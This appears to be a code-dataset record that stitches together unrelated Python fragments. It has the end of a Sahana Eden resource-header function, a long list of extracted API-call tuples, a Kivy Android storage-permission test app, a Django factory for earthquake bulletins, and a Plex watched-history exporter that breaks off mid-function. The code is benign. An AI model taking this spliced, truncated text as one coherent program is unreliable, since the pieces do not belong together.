        # Resource headers only used in interactive views
        return None
    # Idiom fix: None-sentinel instead of a mutable default argument
    if tabs is None:
        tabs = []
    from s3 import s3_rheader_resource, S3ResourceHeader
    tablename, record = s3_rheader_resource(r)
    if tablename != r.tablename:
        resource = current.s3db.resource(tablename, id=record.id)
    else:
        resource = r.resource
    rheader = None
    rheader_fields = []
    if record:
        T = current.T
        if tablename == "event_event":
            if not tabs:
                tabs = [(T("Event Details"), None),
                        (T("Incidents"), "incident"),
                        (T("Units"), "group"),
                        (T("Tasks"), "task"),
                        (T("Updates"), "post"),
                        ]
            rheader_fields = [["name"],
                              ["start_date"],
                              ["comments"],
                              ]
        elif tablename == "event_incident":
            if not tabs:
                tabs = [(T("Incident Details"), None),
                        (T("Units"), "group"),
                        (T("Tasks"), "task"),
                        (T("Updates"), "post"),
                        ]
            rheader_fields = [["name"],
                              ["date"],
                              ["comments"],
                              ]
        rheader = S3ResourceHeader(rheader_fields, tabs)(r,
                                                         table=resource.table,
                                                         record=record,
                                                         )
    return rheader
# END =========================================================================
| [
"s3.s3_fieldmethod",
"gluon.current.db",
"collections.OrderedDict",
"s3.IS_ONE_OF",
"s3.S3ResourceHeader",
"gluon.current.s3db.set_method",
"gluon.current.request.post_vars.get",
"s3.S3DateFilter",
"gluon.URL",
"s3.S3OptionsFilter",
"os.path.join",
"s3.s3_rheader_resource",
"s3.FS",
"gluon... | [((1991, 2042), 'collections.OrderedDict', 'OrderedDict', (["[('en', 'English'), ('es', 'Español')]"], {}), "([('en', 'English'), ('es', 'Español')])\n", (2002, 2042), False, 'from collections import OrderedDict\n'), ((49140, 49162), 's3.s3_rheader_resource', 's3_rheader_resource', (['r'], {}), '(r)\n', (49159, 49162), False, 'from s3 import s3_rheader_resource, S3ResourceHeader\n'), ((9240, 9277), 'gluon.current.request.post_vars.get', 'current.request.post_vars.get', (['"""tags"""'], {}), "('tags')\n", (9269, 9277), False, 'from gluon import current\n'), ((21582, 21645), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'event_name'], {'represent': '(lambda v: v)'}), "('name_click', event_name, represent=lambda v: v)\n", (21596, 21645), False, 'from s3 import s3_fieldmethod\n'), ((22269, 22307), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""status"""', 'event_status'], {}), "('status', event_status)\n", (22283, 22307), False, 'from s3 import s3_fieldmethod\n'), ((22651, 22695), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""incidents"""', 'event_incidents'], {}), "('incidents', event_incidents)\n", (22665, 22695), False, 'from s3 import s3_fieldmethod\n'), ((23038, 23082), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""resources"""', 'event_resources'], {}), "('resources', event_resources)\n", (23052, 23082), False, 'from s3 import s3_fieldmethod\n'), ((23666, 23700), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""tags"""', 'event_tags'], {}), "('tags', event_tags)\n", (23680, 23700), False, 'from s3 import s3_fieldmethod\n'), ((30347, 30413), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'incident_name'], {'represent': '(lambda v: v)'}), "('name_click', incident_name, represent=lambda v: v)\n", (30361, 30413), False, 'from s3 import s3_fieldmethod\n'), ((31049, 31090), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""status"""', 'incident_status'], {}), "('status', incident_status)\n", (31063, 31090), False, 'from s3 import 
s3_fieldmethod\n'), ((39842, 39902), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'hr_name'], {'represent': '(lambda v: v)'}), "('name_click', hr_name, represent=lambda v: v)\n", (39856, 39902), False, 'from s3 import s3_fieldmethod\n'), ((42057, 42118), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'org_name'], {'represent': '(lambda v: v)'}), "('name_click', org_name, represent=lambda v: v)\n", (42071, 42118), False, 'from s3 import s3_fieldmethod\n'), ((43455, 43510), 's3.S3SQLCustomForm', 'S3SQLCustomForm', (['"""incident_id"""', '"""group_id"""', '"""status_id"""'], {}), "('incident_id', 'group_id', 'status_id')\n", (43470, 43510), False, 'from s3 import S3SQLCustomForm\n'), ((44225, 44287), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'team_name'], {'represent': '(lambda v: v)'}), "('name_click', team_name, represent=lambda v: v)\n", (44239, 44287), False, 'from s3 import s3_fieldmethod\n'), ((46780, 46869), 'gluon.current.s3db.set_method', 'current.s3db.set_method', (['"""pr"""', '"""person"""'], {'method': '"""dashboard"""', 'action': 'person_Dashboard'}), "('pr', 'person', method='dashboard', action=\n person_Dashboard)\n", (46803, 46869), False, 'from gluon import current\n'), ((47786, 47848), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'task_name'], {'represent': '(lambda v: v)'}), "('name_click', task_name, represent=lambda v: v)\n", (47800, 47848), False, 'from s3 import s3_fieldmethod\n'), ((49215, 49261), 'gluon.current.s3db.resource', 'current.s3db.resource', (['tablename'], {'id': 'record.id'}), '(tablename, id=record.id)\n', (49236, 49261), False, 'from gluon import current\n'), ((12482, 12511), 's3.S3SQLCustomForm', 'S3SQLCustomForm', (['*crud_fields'], {}), '(*crud_fields)\n', (12497, 12511), False, 'from s3 import S3SQLCustomForm\n'), ((31593, 31640), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""resources"""', 'incident_resources'], {}), "('resources', incident_resources)\n", 
(31607, 31640), False, 'from s3 import s3_fieldmethod\n'), ((32296, 32333), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""tags"""', 'incident_tags'], {}), "('tags', incident_tags)\n", (32310, 32333), False, 'from s3 import s3_fieldmethod\n'), ((50355, 50393), 's3.S3ResourceHeader', 'S3ResourceHeader', (['rheader_fields', 'tabs'], {}), '(rheader_fields, tabs)\n', (50371, 50393), False, 'from s3 import s3_rheader_resource, S3ResourceHeader\n'), ((4645, 4719), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Home"""', 'restricted': '(False)', 'access': 'None', 'module_type': 'None'}), "(name_nice='Home', restricted=False, access=None, module_type=None)\n", (4652, 4719), False, 'from gluon.storage import Storage\n'), ((4985, 5073), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Administration"""', 'restricted': '(True)', 'access': '"""|1|"""', 'module_type': 'None'}), "(name_nice='Administration', restricted=True, access='|1|',\n module_type=None)\n", (4992, 5073), False, 'from gluon.storage import Storage\n'), ((5347, 5417), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Administration"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Administration', restricted=True, module_type=None)\n", (5354, 5417), False, 'from gluon.storage import Storage\n'), ((5763, 5852), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Synchronization"""', 'restricted': '(True)', 'access': '"""|1|"""', 'module_type': 'None'}), "(name_nice='Synchronization', restricted=True, access='|1|',\n module_type=None)\n", (5770, 5852), False, 'from gluon.storage import Storage\n'), ((6324, 6380), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Map"""', 'restricted': '(True)', 'module_type': '(1)'}), "(name_nice='Map', restricted=True, module_type=1)\n", (6331, 6380), False, 'from gluon.storage import Storage\n'), ((6550, 6694), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Persons"""', 'description': '"""Central point 
to record details on People"""', 'restricted': '(True)', 'access': '"""|1|"""', 'module_type': 'None'}), "(name_nice='Persons', description=\n 'Central point to record details on People', restricted=True, access=\n '|1|', module_type=None)\n", (6557, 6694), False, 'from gluon.storage import Storage\n'), ((6897, 6964), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Organizations"""', 'restricted': '(True)', 'module_type': '(10)'}), "(name_nice='Organizations', restricted=True, module_type=10)\n", (6904, 6964), False, 'from gluon.storage import Storage\n'), ((7224, 7288), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Contacts"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Contacts', restricted=True, module_type=None)\n", (7231, 7288), False, 'from gluon.storage import Storage\n'), ((7417, 7489), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Content Management"""', 'restricted': '(True)', 'module_type': '(10)'}), "(name_nice='Content Management', restricted=True, module_type=10)\n", (7424, 7489), False, 'from gluon.storage import Storage\n'), ((7579, 7638), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Events"""', 'restricted': '(True)', 'module_type': '(2)'}), "(name_nice='Events', restricted=True, module_type=2)\n", (7586, 7638), False, 'from gluon.storage import Storage\n'), ((7727, 7787), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Fire"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Fire', restricted=True, module_type=None)\n", (7734, 7787), False, 'from gluon.storage import Storage\n'), ((7878, 7940), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Police"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Police', restricted=True, module_type=None)\n", (7885, 7940), False, 'from gluon.storage import Storage\n'), ((8032, 8093), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Tasks"""', 'restricted': '(True)', 
'module_type': 'None'}), "(name_nice='Tasks', restricted=True, module_type=None)\n", (8039, 8093), False, 'from gluon.storage import Storage\n'), ((8181, 8246), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Documents"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Documents', restricted=True, module_type=None)\n", (8188, 8246), False, 'from gluon.storage import Storage\n'), ((8420, 8486), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Statistics"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Statistics', restricted=True, module_type=None)\n", (8427, 8486), False, 'from gluon.storage import Storage\n'), ((16103, 16162), 's3.S3DateFilter', 'S3DateFilter', (['"""date"""'], {'label': '""""""', 'slider': '(True)', 'clear_text': '"""X"""'}), "('date', label='', slider=True, clear_text='X')\n", (16115, 16162), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((21271, 21350), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': '"""event"""', 'args': "[row['event_event.id'], 'custom']", 'extension': '""""""'}), "(c='event', f='event', args=[row['event_event.id'], 'custom'], extension='')\n", (21274, 21350), False, 'from gluon import A, URL\n'), ((26637, 26654), 'gluon.current.db', 'current.db', (['query'], {}), '(query)\n', (26647, 26654), False, 'from gluon import current\n'), ((30027, 30116), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': '"""incident"""', 'args': "[row['event_incident.id'], 'custom']", 'extension': '""""""'}), "(c='event', f='incident', args=[row['event_incident.id'], 'custom'],\n extension='')\n", (30030, 30116), False, 'from gluon import A, URL\n'), ((34998, 35105), 's3.S3SQLCustomForm', 'S3SQLCustomForm', (['"""name"""', '"""description"""', '"""source"""', '"""priority"""', '"""pe_id"""', '"""date_due"""', '"""status"""', '"""comments"""'], {}), "('name', 'description', 'source', 'priority', 'pe_id',\n 'date_due', 'status', 'comments')\n", 
(35013, 35105), False, 'from s3 import S3SQLCustomForm\n'), ((37121, 37200), 'os.path.join', 'os.path.join', (['r.folder', '"""modules"""', '"""templates"""', '"""WACOP"""', '"""views"""', '"""assign.html"""'], {}), "(r.folder, 'modules', 'templates', 'WACOP', 'views', 'assign.html')\n", (37133, 37200), False, 'import os\n'), ((39646, 39719), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': 'f', 'args': "[record_id, 'human_resource', hr_id, 'profile']"}), "(c='event', f=f, args=[record_id, 'human_resource', hr_id, 'profile'])\n", (39649, 39719), False, 'from gluon import A, URL\n'), ((41854, 41939), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': 'f', 'args': "[record_id, 'organisation', organisation_id, 'profile']"}), "(c='event', f=f, args=[record_id, 'organisation', organisation_id,\n 'profile'])\n", (41857, 41939), False, 'from gluon import A, URL\n'), ((43967, 44052), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': 'f', 'args': "[record_id, 'group', group_id, 'profile']", 'extension': '""""""'}), "(c='event', f=f, args=[record_id, 'group', group_id, 'profile'],\n extension='')\n", (43970, 44052), False, 'from gluon import A, URL\n'), ((47574, 47659), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': 'f', 'args': "[record_id, 'task', row['project_task.id'], 'profile']"}), "(c='event', f=f, args=[record_id, 'task', row['project_task.id'], 'profile']\n )\n", (47577, 47659), False, 'from gluon import A, URL\n'), ((11839, 11934), 's3.IS_ONE_OF', 'IS_ONE_OF', (['set', '"""event_incident.id"""', 'f.represent'], {'orderby': '"""event_incident.name"""', 'sort': '(True)'}), "(set, 'event_incident.id', f.represent, orderby=\n 'event_incident.name', sort=True)\n", (11848, 11934), False, 'from s3 import IS_ONE_OF, S3SQLCustomForm, S3SQLInlineComponent\n'), ((17154, 17229), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""series_id"""'], {'label': '""""""', 'noneSelectedText': '"""Type"""', 'no_opts': '""""""'}), "('series_id', label='', noneSelectedText='Type', 
no_opts='')\n", (17169, 17229), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((17495, 17573), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""priority"""'], {'label': '""""""', 'noneSelectedText': '"""Priority"""', 'no_opts': '""""""'}), "('priority', label='', noneSelectedText='Priority', no_opts='')\n", (17510, 17573), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((17839, 17916), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""status_id"""'], {'label': '""""""', 'noneSelectedText': '"""Status"""', 'no_opts': '""""""'}), "('status_id', label='', noneSelectedText='Status', no_opts='')\n", (17854, 17916), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((18182, 18281), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""created_by$organisation_id"""'], {'label': '""""""', 'noneSelectedText': '"""Source"""', 'no_opts': '""""""'}), "('created_by$organisation_id', label='', noneSelectedText=\n 'Source', no_opts='')\n", (18197, 18281), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((18542, 18627), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""tag_post.tag_id"""'], {'label': '""""""', 'noneSelectedText': '"""Tag"""', 'no_opts': '""""""'}), "('tag_post.tag_id', label='', noneSelectedText='Tag', no_opts=''\n )\n", (18557, 18627), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((26777, 26872), 's3.IS_ONE_OF', 'IS_ONE_OF', (['set', '"""event_incident.id"""', 'f.represent'], {'orderby': '"""event_incident.name"""', 'sort': '(True)'}), "(set, 'event_incident.id', f.represent, orderby=\n 'event_incident.name', sort=True)\n", (26786, 26872), False, 'from s3 import IS_ONE_OF, S3SQLCustomForm, S3SQLInlineComponent\n'), ((19152, 19252), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""incident_post.incident_id"""'], {'label': '""""""', 'noneSelectedText': '"""Incident"""', 
'no_opts': '""""""'}), "('incident_post.incident_id', label='', noneSelectedText=\n 'Incident', no_opts='')\n", (19167, 19252), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((16060, 16065), 's3.FS', 'FS', (['k'], {}), '(k)\n', (16062, 16065), False, 'from s3 import FS\n'), ((35935, 35962), 's3.S3SQLCustomForm', 'S3SQLCustomForm', (['"""event_id"""'], {}), "('event_id')\n", (35950, 35962), False, 'from s3 import S3SQLCustomForm\n')] |
import kivy
from kivy.app import App
from kivy.uix.button import Button
import android
import os
import time
from android.permissions import Permission, request_permission, check_permission
from kivy.clock import Clock
class MyApp(App):
def second_thread(self, data):
print("starting second thread")
permission_status = check_permission(Permission.WRITE_EXTERNAL_STORAGE)
print(permission_status)
if permission_status is not None and permission_status:
print("got permission")
path = os.environ["SECONDARY_STORAGE"]
test_path = os.path.join(path, "test_yay")
os.makedirs(test_path)
else:
Clock.schedule_once(self.second_thread, 1)
def callback(self, data):
print("Pushed button, running")
print("request permission")
print(request_permission(Permission.WRITE_EXTERNAL_STORAGE))
Clock.schedule_once(self.second_thread, 5)
def build(self):
return Button(text='Touch to test writing to ' + os.environ["SECONDARY_STORAGE"], on_press=self.callback)
if __name__ == '__main__':
MyApp().run()
| [
"kivy.uix.button.Button",
"os.makedirs",
"os.path.join",
"kivy.clock.Clock.schedule_once",
"android.permissions.request_permission",
"android.permissions.check_permission"
] | [((344, 395), 'android.permissions.check_permission', 'check_permission', (['Permission.WRITE_EXTERNAL_STORAGE'], {}), '(Permission.WRITE_EXTERNAL_STORAGE)\n', (360, 395), False, 'from android.permissions import Permission, request_permission, check_permission\n'), ((956, 998), 'kivy.clock.Clock.schedule_once', 'Clock.schedule_once', (['self.second_thread', '(5)'], {}), '(self.second_thread, 5)\n', (975, 998), False, 'from kivy.clock import Clock\n'), ((1039, 1141), 'kivy.uix.button.Button', 'Button', ([], {'text': "('Touch to test writing to ' + os.environ['SECONDARY_STORAGE'])", 'on_press': 'self.callback'}), "(text='Touch to test writing to ' + os.environ['SECONDARY_STORAGE'],\n on_press=self.callback)\n", (1045, 1141), False, 'from kivy.uix.button import Button\n'), ((613, 643), 'os.path.join', 'os.path.join', (['path', '"""test_yay"""'], {}), "(path, 'test_yay')\n", (625, 643), False, 'import os\n'), ((656, 678), 'os.makedirs', 'os.makedirs', (['test_path'], {}), '(test_path)\n', (667, 678), False, 'import os\n'), ((705, 747), 'kivy.clock.Clock.schedule_once', 'Clock.schedule_once', (['self.second_thread', '(1)'], {}), '(self.second_thread, 1)\n', (724, 747), False, 'from kivy.clock import Clock\n'), ((893, 946), 'android.permissions.request_permission', 'request_permission', (['Permission.WRITE_EXTERNAL_STORAGE'], {}), '(Permission.WRITE_EXTERNAL_STORAGE)\n', (911, 946), False, 'from android.permissions import Permission, request_permission, check_permission\n')] |
from datetime import timedelta
import random
from django.utils import timezone
import factory
class BulletinFactory(factory.DjangoModelFactory):
class Meta:
model = 'bulletin.Bulletin'
url = factory.Sequence(lambda n: f'https://www.sitepage.com/{n}')
latitude = factory.Faker(
'pydecimal',
right_digits=2,
min_value=-90,
max_value=90
)
longitude = factory.Faker(
'pydecimal',
right_digits=2,
min_value=-180,
max_value=180
)
depth = factory.Faker(
'pydecimal',
right_digits=1,
min_value=0,
max_value=500
)
magnitude = factory.Faker(
'pydecimal',
right_digits=1,
min_value=1,
max_value=10
)
location = factory.Faker('address')
@factory.sequence
def time_of_quake(n):
"""Creates sequence of datetime obj 30 minutes apart."""
td = timedelta(minutes=30)
return timezone.now() - (n * td)
| [
"django.utils.timezone.now",
"factory.Faker",
"datetime.timedelta",
"factory.Sequence"
] | [((224, 283), 'factory.Sequence', 'factory.Sequence', (["(lambda n: f'https://www.sitepage.com/{n}')"], {}), "(lambda n: f'https://www.sitepage.com/{n}')\n", (240, 283), False, 'import factory\n'), ((300, 371), 'factory.Faker', 'factory.Faker', (['"""pydecimal"""'], {'right_digits': '(2)', 'min_value': '(-90)', 'max_value': '(90)'}), "('pydecimal', right_digits=2, min_value=-90, max_value=90)\n", (313, 371), False, 'import factory\n'), ((432, 505), 'factory.Faker', 'factory.Faker', (['"""pydecimal"""'], {'right_digits': '(2)', 'min_value': '(-180)', 'max_value': '(180)'}), "('pydecimal', right_digits=2, min_value=-180, max_value=180)\n", (445, 505), False, 'import factory\n'), ((562, 632), 'factory.Faker', 'factory.Faker', (['"""pydecimal"""'], {'right_digits': '(1)', 'min_value': '(0)', 'max_value': '(500)'}), "('pydecimal', right_digits=1, min_value=0, max_value=500)\n", (575, 632), False, 'import factory\n'), ((693, 762), 'factory.Faker', 'factory.Faker', (['"""pydecimal"""'], {'right_digits': '(1)', 'min_value': '(1)', 'max_value': '(10)'}), "('pydecimal', right_digits=1, min_value=1, max_value=10)\n", (706, 762), False, 'import factory\n'), ((822, 846), 'factory.Faker', 'factory.Faker', (['"""address"""'], {}), "('address')\n", (835, 846), False, 'import factory\n'), ((979, 1000), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(30)'}), '(minutes=30)\n', (988, 1000), False, 'from datetime import timedelta\n'), ((1017, 1031), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1029, 1031), False, 'from django.utils import timezone\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# python3 -m pip install --force -U --user PlexAPI
"""
Metadata to be handled:
* Audiobooks
* Playlists -- https://github.com/pkkid/python-plexapi/issues/551
"""
import copy
import json
import time
import logging
import collections
from urllib.parse import urlparse
import plexapi
import plexapi.video
import plexapi.myplex
import plexapi.server
import plexapi.library
import plexapi.exceptions
PLEX_URL = ""
PLEX_TOKEN = ""
WATCHED_HISTORY = ""
LOG_FILE = ""
BATCH_SIZE = 10000
PLEX_REQUESTS_SLEEP = 0
CHECK_USERS = [
]
LOG_FORMAT = \
"[%(name)s][%(process)05d][%(asctime)s][%(levelname)-8s][%(funcName)-15s]" \
" %(message)s"
LOG_DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
LOG_LEVEL = logging.INFO
plexapi.server.TIMEOUT = 3600
plexapi.server.X_PLEX_CONTAINER_SIZE = 2500
_SHOW_RATING_KEY_GUID_MAPPING = {}
_MOVIE_RATING_KEY_GUID_MAPPING = {}
_EPISODE_RATING_KEY_GUID_MAPPING = {}
logger = logging.getLogger("PlexWatchedHistoryExporter")
SHOW_HISTORY = {
'guid': "",
'title': "",
'watched': False,
'userRating': "",
'episodes': collections.defaultdict(lambda: copy.deepcopy(EPISODE_HISTORY))
}
MOVIE_HISTORY = {
'guid': "",
'title': "",
'watched': False,
'viewCount': 0,
'viewOffset': 0,
'userRating': ""
}
EPISODE_HISTORY = {
'guid': "",
'title': "",
'watched': False,
'viewCount': 0,
'viewOffset': 0,
'userRating': ""
}
def _get_config_str(key):
return plexapi.CONFIG.get(key, default="", cast=str).strip("'").strip('"').strip()
def _load_config():
global PLEX_URL, PLEX_TOKEN, WATCHED_HISTORY, CHECK_USERS, LOG_FILE, LOG_LEVEL
if PLEX_URL == "":
PLEX_URL = _get_config_str("sync.src_url")
if PLEX_TOKEN == "":
PLEX_TOKEN = _get_config_str("sync.src_token")
if WATCHED_HISTORY == "":
WATCHED_HISTORY = _get_config_str("sync.watched_history")
if len(CHECK_USERS) == 0:
config_check_users = _get_config_str("sync.check_users").split(",")
CHECK_USERS = [user.strip() for user in config_check_users if user]
if LOG_FILE == "":
LOG_FILE = _get_config_str("sync.export_log_file")
debug = plexapi.utils.cast(bool, _get_config_str("sync.debug").lower())
if debug:
LOG_LEVEL = logging.DEBUG
def _setup_logger():
logging.Formatter.converter = time.gmtime
logging.raiseExceptions = False
logger.setLevel(logging.DEBUG)
logger.handlers = []
logger.propagate = False
detailed_formatter = logging.Formatter(fmt=LOG_FORMAT,
datefmt=LOG_DATE_FORMAT)
file_handler = logging.FileHandler(filename=LOG_FILE, mode="a+")
file_handler.setFormatter(detailed_formatter)
file_handler.setLevel(LOG_LEVEL)
logger.addHandler(file_handler)
def _cast(func, value):
if value is None:
return func()
if func == str:
return str(value)
if not isinstance(value, func):
raise ValueError(value)
return value
def _get_guid(rating_key_guid_mapping, item):
if item.ratingKey in rating_key_guid_mapping:
item_guid = rating_key_guid_mapping[item.ratingKey]
else:
item_guid = item.guid
rating_key_guid_mapping[item.ratingKey] = item_guid
return item_guid
def _tv_item_iterator(plex_section, start, batch_size):
libtype = "show"
# Get shows that have been fully watched
watched_kwargs = {'show.unwatchedLeaves': False}
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**watched_kwargs
)
for item in items:
logger.debug(f"Fully Watched Show: {item.title}")
yield item
# Get shows have have not been fully watched but have episodes have been fully watched
# Searching by episode.viewCount instead of show.viewCount to handle shows with
# episodes that were watched and then unwatched
partially_watched_kwargs = {'show.unwatchedLeaves': True, 'episode.viewCount!=': 0}
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**partially_watched_kwargs
)
for item in items:
logger.debug(f"Partially Watched Show with Fully Watched Episodes: {item.title}")
yield item
# Get shows have have not been fully watched and have no episodes that have been fully
# watched but have episodes that are in-progress
partially_watched_kwargs = {'show.unwatchedLeaves': True, 'show.viewCount=': 0,
'episode.inProgress': True}
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**partially_watched_kwargs
)
for item in items:
logger.debug(f"Partially Watched Show with Partially Watched Episodes: {item.title}")
yield item
def _movie_item_iterator(plex_section, start, batch_size):
libtype = "movie"
watched_kwargs = {'movie.viewCount!=': 0}
partially_watched_kwargs = {'movie.viewCount=': 0, 'movie.inProgress': True}
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**watched_kwargs
)
for item in items:
yield item
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**partially_watched_kwargs
)
for item in items:
yield item
def _batch_get(plex_section, batch_size):
start = 0
while True:
if start >= plex_section.totalSize:
break
if isinstance(plex_section, plexapi.library.ShowSection):
yield from _tv_item_iterator(plex_section, start, batch_size)
elif isinstance(plex_section, plexapi.library.MovieSection):
yield from _movie_item_iterator(plex_section, start, batch_size)
else:
logger.warning(f"Skipping Un-processable Section: {plex_section.title} [{plex_section.type}]")
return
start = start + 1 + batch_size
def _get_movie_section_watched_history(section, movie_history):
movies_watched_history = _batch_get(section, BATCH_SIZE)
for movie in movies_watched_history:
movie_guid = _get_guid(_MOVIE_RATING_KEY_GUID_MAPPING, movie)
# TODO: Check if reload is necessary
# movie.reload(checkFiles=False)
if urlparse(movie_guid).scheme != 'plex':
continue
if movie.isWatched:
logger.debug(f"Fully Watched Movie: {movie.title} [{movie_guid}]")
movie_history[movie_guid].update({
'guid': _cast(str, movie_guid),
'title': _cast(str, movie.title),
'watched': _cast(bool, movie.isWatched),
'viewCount': _cast(int, movie.viewCount),
'viewOffset': _cast(int, movie.viewOffset),
'userRating': _cast(str, movie.userRating)
})
else:
logger.debug(f"Partially Watched Movie: {movie.title} [{movie_guid}]")
existing_watched = movie_history[movie_guid]['watched']
# Prefer fully watched over partially watched entries
# TODO: Check for userRating & viewOffset too, however this shouldn't ever be
# different since Plex tracks the item via the GUID across libraries/sections
if existing_watched:
continue
movie_history[movie_guid].update({
'guid': _cast(str, movie_guid),
'title': _cast(str, movie.title),
'watched': _cast(bool, movie.isWatched),
'viewCount': _cast(int, movie.viewCount),
'viewOffset': _cast(int, movie.viewOffset),
'userRating': _cast(str, movie.userRating)
})
def _get_show_section_watched_history(section, show_history):
shows_watched_history = _batch_get(section, BATCH_SIZE)
for show in shows_watched_history:
show_guid = _get_guid(_SHOW_RATING_KEY_GUID_MAPPING, show)
# TODO: Check if reload is necessary
# show.reload(checkFiles=False)
if urlparse(show_guid).scheme != 'plex':
continue
show_item_history = show_history[show_guid]
if show.isWatched:
logger.debug(f"Fully Watched Show: {show.title} [{show_guid}]")
show_item_history.update({
'guid': _cast(str, show_guid),
'title': _cast(str, show.title),
'watched': _cast(bool, show.isWatched),
'userRating': _cast(str, show.userRating),
})
for episode in show.episodes(viewCount__gt=0):
episode_guid = _get_guid(_EPISODE_RATING_KEY_GUID_MAPPING, episode)
logger.debug(f"Fully Watched Episode: {episode.title} [{episode_guid}]")
show_item_history['episodes'][episode_guid].update({
'guid': _cast(str, episode_guid),
'title': _cast(str, episode.title),
'watched': _cast(bool, episode.isWatched),
'viewCount': _cast(int, episode.viewCount),
'viewOffset': _cast(int, episode.viewOffset),
'userRating': _cast(str, episode.userRating),
})
else:
logger.debug(f"Partially Watched Show: {show.title} [{show_guid}]")
# Prefer fully watched over partially watched entries
# TODO: Check for userRating & viewOffset too, however this shouldn't ever be
# different since Plex tracks the item via the GUID across libraries/sections
existing_watched = show_item_history['watched']
if existing_watched:
continue
show_item_history.update({
'guid': _cast(str, show_guid),
'title': _cast(str, show.title),
'watched': _cast(bool, show.isWatched),
'userRating': _cast(str, show.userRating),
})
for episode in show.episodes(viewCount__gt=0):
episode_guid = _get_guid(_EPISODE_RATING_KEY_GUID_MAPPING, episode)
logger.debug(f"Fully Watched Episode: {episode.title} [{episode_guid}]")
show_item_history['episodes'][episode_guid].update({
'guid': _cast(str, episode_guid),
'title': _cast(str, episode.title),
'watched': _cast(bool, episode.isWatched),
'viewCount': _cast(int, episode.viewCount),
'viewOffset': _cast(int, episode.viewOffset),
'userRating': _cast(str, episode.userRating),
})
for episode in show.episodes(viewOffset__gt=0):
episode_guid = _get_guid(_EPISODE_RATING_KEY_GUID_MAPPING, episode)
logger.debug(f"Partially Watched Episode: {episode.title} [{episode_guid}]")
show_item_history['episodes'][episode_guid].update({
'guid': _cast(str, episode_guid),
'title': _cast(str, episode.title),
'watched': _cast(bool, episode.isWatched),
'viewCount': _cast(int, episode.viewCount),
'viewOffset': _cast(int, episode.viewOffset),
'userRating': _cast(str, episode.userRating),
})
show_history[show_guid] = show_item_history
def _get_user_server_watched_history(server):
show_history = collections.defaultdict(lambda: copy.deepcopy(SHOW_HISTORY))
movie_history = collections.defaultdict(lambda: copy.deepcopy(MOVIE_HISTORY))
music_history = {}
for section in server.library.sections():
if section.type == "movie":
_get_movie_section_watched_history(section, movie_history)
elif section.type == "show":
_get_show_section_watched_history(section, show_history)
else:
logger.warning(f"Skipping Un-processable Section: {section.title} [{section.type}]")
user_history = {
'show': show_history,
'movie': movie_history,
'music': music_history,
}
return user_history
def main():
_load_config()
_setup_logger()
plex_server = plexapi.server.PlexServer(PLEX_URL, PLEX_TOKEN, timeout=300)
plex_account = plex_server.myPlexAccount()
watched_history = {}
